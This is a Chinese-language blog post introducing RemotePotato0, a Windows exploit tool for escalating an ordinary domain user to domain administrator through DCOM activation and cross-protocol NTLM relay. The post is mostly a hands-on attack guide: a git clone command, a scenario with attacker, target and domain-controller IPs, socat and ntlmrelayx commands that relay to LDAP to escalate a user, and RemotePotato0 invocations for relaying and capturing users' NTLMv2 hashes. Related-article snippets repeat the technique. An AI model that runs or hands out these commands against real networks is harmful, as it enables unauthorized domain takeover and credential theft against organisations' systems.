使用RemotePotato0从普通用户提升至域管理员

最新推荐文章于 2024-05-07 14:08:57 发布
最新推荐文章于 2024-05-07 14:08:57 发布
阅读量267 收藏
点赞数
分类专栏: 安全 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43977912/article/details/120666817
版权

关于RemotePotato0
RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。
RemotePotato0可以利用DCOM激活服务,并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时,该工具还需要在相同设备上已经有特权用户登录了(比如说,域管理员用户)。一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该服务器将负责接收特权type1消息,并通过解包RPC协议和HTTP打包身份验证,然后将其中继到第三个资源。在接收端,你可以设置另一个中继节点(如ntlmrelayx)或直接中继到特权资源。除此之外,RemotePotato0还允许抓取和窃取登录到目标设备上的每个用户的NTLMv2哈希。

源码获取
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/antonioCoco/RemotePotato0.git

使用场景
攻击设备(10.0.0.20)
目标设备(10.0.0.45)
目标域控制器(10.0.0.10)
模块0 - Rpc2Http跨协议中继服务器 + potato触发器
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
注意:如果你操作的是Windows Server <= 2016,你可以避免使用网络重定向器(socat):
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
模块1 - Rpc2Http跨协议中继服务器
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
模块2 - RPC捕捉(哈希)服务器
.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

工具使用
RemotePotato0
Mandatory args:
-m module
Allowed values:
0 - Rpc2Http cross protocol relay server + potato trigger (default)
1 - Rpc2Http cross protocol relay server
2 - Rpc capture (hash) server + potato trigger
3 - Rpc capture (hash) server

Other args: (someone could be mandatory and/or optional based on the module you use)
-r 远程HTTP中继服务器IP
-t 远程HTTP中继服务器端口 (默认为80)
-x 流氓Oxid解析器IP (默认为127.0.0.1)
-p 流氓Oxid解析器端口 (默认为9999)
-l RPC中继服务器监听端口 (默认为9997)
-s 跨会话激活攻击的目标会话IP (默认为disabled)
-c CLSID (默认为{5167B42F-C111-47A1-ACC4-8EABE61B0B54})

工具演示
跨会话激活:【GIF】
哈希窃取:【GIF】

项目地址
RemotePotato0:https://github.com/antonioCoco/RemotePotato0

在这里插入图片描述

黄一113530
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RemotePotato0域内权限提升漏洞
谢公子的博客
09-18 3416
RemotePotato是Antonio Cocomazzi和Andrea Pierini发现的一种域内攻击技术,它允许攻击者将域用户权限提升到Enterprise Admin组内,此技术执行跨协议中继以实现NTLM Relay攻击,并将提升的NTLM身份验证流量中继到域控制器以实现权限提升。 利用前提条件: 具有域管理员特权的用户已经登录到受害者主机或通过远程桌面登录 攻击者已获得对受害者主机的初始访问权限,或者已通过WinRM或SSH访问(拥有本地管理员权限的账号,可以是本地administrat
RemotePotato0:从用户到域管理员的另一次“不会修复” Windows特权升级
05-12
遥控土豆0 从用户到域管理员的另一个Windows特权升级“不会解决”。 RemotePotato0是一种利用程序,可让您将特权从一般用户升级为Domain Admin。 简要地: 它滥用DCOM激活服务并触发当前在目标计算机上登录的用户的NTLM身份验证。 要求您在会话0中具有外壳(例如WinRm Shell或SSH Shell),并且特权用户在会话1中已登录(例如Domain Admin用户)。 触发NTLM type1后,我们将建立一个跨协议中继服务器,以接收特权的type1消息,并通过解压缩RPC协议并通过HTTP打包身份验证将其中继到第三个资源。 在接收端,您可以设置另一个中继节点(例如ntlmrelayx)或直接中继到特权资源。 有关详细信息,请访问-> 例子 攻击者机器(192.168.83.130): sudo socat TCP-LISTEN:135,for
Remote Potato–从域用户到企业管理员
weixin_51387754的博客
05-10 493
文章前言 NTLM中继是一项众所周知的技术,主要用于安全评估中,以便在网络中的服务器上建立立足点或用于特权提升方案。在没有为LDAP和SMB协议启用签名的网络中,这种攻击是可行的。此外,正在使用提升的帐户身份验证到服务器和工作站中的域管理员可以为攻击者提供机会,使他们可以通过LSASS或通过使用远程马铃薯技术来转储其凭据,从而对整个域造成损害。 Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到Enterprise
2024年网络安全最新使用RemotePotato0普通用户提升至域管理员_potato-2(1),网络安全研发岗面试复盘总结
最新发布
2401_84264096的博客
05-07 613
一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该服务器将负责接收特权type1消息,并通过解包RPC协议和HTTP打包身份验证,然后将其中继到第三个资源。RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。,大家跟着这个大的方向学习准没问题。
AD域下,普通用户环境下安装软件需要管理员权限的解决办法
一个热衷于研究问题、解决问题的IT直男;一个执着于知所以然更要知其所以然的小男孩
09-15 5708
AD域下,普通用户环境下安装软件需要管理员权限的解决办法
域控服务器通过策略提升普通用户权限
u014588173的博客
11-16 2054
提升普通域用户权限,用于普通用户安装软件 1.在域控主机上添加一条GPO,指向需要权限的OU 2.编辑GPO-用户配置-控制面板设置-本地用户和组 3.然后右击-新建-本地组 4.操作选:更新, 组名选Administrators(内置),勾选选加当前用户 设置完成后,域服务器更新组策略(gpupdate) 然后到域用户电脑,注销当前登录或重启电脑。域用户就有本机管理员的权限了
WinServer 2012 R2 AD 组策略 将域用户加入本地管理员
一直被模仿,从未被超越
10-08 1万+
需求:域用户shihua.ma添加入到本地管理员组 先查看本地管理员组 net localgroup administrators 通过以上得知,shihua.ma这个域用户不在本地管理员组。下面介绍如何将域用户自动加入到本地管理员组 一、服务器设置 1、工具 → 组策略管理 → 域 → Default Domain Policy → 右键编辑 2、计算机配置 → 首选项 → 本地用户和组 → 右键 新建 本地组 3、操作选项卡:更新,组名选项卡:Administrators(.
RemotePotato0域内权限提升
Adminxe的博客
03-05 335
NTLM中继是一项众所周知的技术,主要用于安全评估中,以便在网络中的服务器上建立立足点或用于特权提升方案。在没有为LDAP和SMB协议启用签名的网络中,这种攻击是可行的。此外,正在使用提升的帐户身份验证到服务器和工作站中的域管理员可以为攻击者提供机会,使他们可以通过LSASS或通过使用远程马铃薯技术来转储其凭据,从而对整个域造成损害。Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到。
linux服务器将普通用户升级为管理员用户
hjxloveqsx的博客
10-10 6469
输入sudo vi /etc/sudoers,在文件root ALL=(ALL) ALL后添加一行:test ALL=(ALL) ALL
如何使计算机用户具有管理权限,如何把电脑普通用户权限提升超级管理员账户...
weixin_34404671的博客
06-20 5408
电脑win10会默认的让你新建一个用户。这样的目的是给用户降权,防止一些误操作损坏系统。很多同学都会说,我已经不是新手了。有管理员权限还是会方便一些的。那么今天就教大家如何提升普通用户的权限。一、开启系统默认的administrator账户打开运行,输入“compmgmt.msc”后进入计算机管理。开启administrator账户。(在win10中administrator账户默认是没有开启的)...
微软拒绝修复影响所有 Windows 版本的 “RemotePotatoo” 提权0day
smellycat000的专栏
01-14 187
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Sentinel LABS 的研究员 Antonio Cocomazzi 发现了一个影响所有 Windows 版本的提权漏洞,可导致攻击...
Potato家族本地提权细节
weixin_44216796的博客
12-28 2892
本文结合POC源码,研究Potato家族本地提权细节 Feature or vulnerability 该提权手法的前提是拥有SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限,以下用户拥有SeImpersonatePrivilege权限(而只有更高权限的账户比如SYSTEM才有SeAssignPrimaryTokenPrivilege权限): 本地管理员账户(不包括管理员组普通账户)和本地服务帐户 由SCM启动的服务 P.s. 本机测试时即使在
为域用户提升本机管理员权限
weixin_30550081的博客
04-09 1195
假如用户“test_2”成功加入域“xx.com”后,默认是域用户权限,怎样让这个域用户在本机有管理员权限呢?请如下操作。 用本机管理员登陆电脑。右键点击我的电脑->管理->本地用户和组->组 右键选择“Administrators->属性”,点击“添加”然后输入”test_2“,输入域管理员的账号和密码,确定后添加成功,然后重启电脑,用test_2的用户名登陆到xx....
利用dns特性把普通域用户提升到域管理员权限
一个码农的笔记
10-17 2775
翻译自:https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 翻译人:聂心明 背景 除了使用自己开发的DNS服务器以外,微软还给这个服务器开发了管理协议,用这个协议可以更方便和更集中的管理域控服务器。默认情况下,域控服务器也是DNS服务器;DNS服务器几乎可访...
提权—网站的权限后台漏洞第三方
qi_SJQ_的博客
01-30 4164
1.权限提升: 此处提权指的不是让网站的普通用户获取到管理员的权限(那属于网站的逻辑漏洞)而是我们已经利用网站的漏洞拿到了一些权限乃至webshell后如何利用网站权限进而获取到数据库、操作系统、服务器等的权限。 2.具体有哪些权限需要我们知道和了解掌握的? 后台权限、网站权限、数据库权限、接口权限、系统权限、域控权限等。 1)后台权限(获得方式:爆破、注入猜解、弱口令等):一般网站或应用后台智能操作应用的界面内容、数据图片等信息,无法操作程序的源代码或服务器上的资源文件。(如后台功能存在文件操作的话.
linux下如何添加一个用户并且让用户获得root权限
stonesharp的专栏
04-10 1936
转自:http://blog.sina.com.cn/s/blog_6fc583e70100n6rm.html ################################################ 测试环境:CentOS 5.5 1、添加用户,首先用adduser命令添加一个普通用户,命令如下:  #adduser tommy  //添加一个名为t
获取域管理员权限的几种方式
热门推荐
10-11 1万+
在不考虑直接攻击域控的情况下,如何快速获取域管理员权限呢?在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值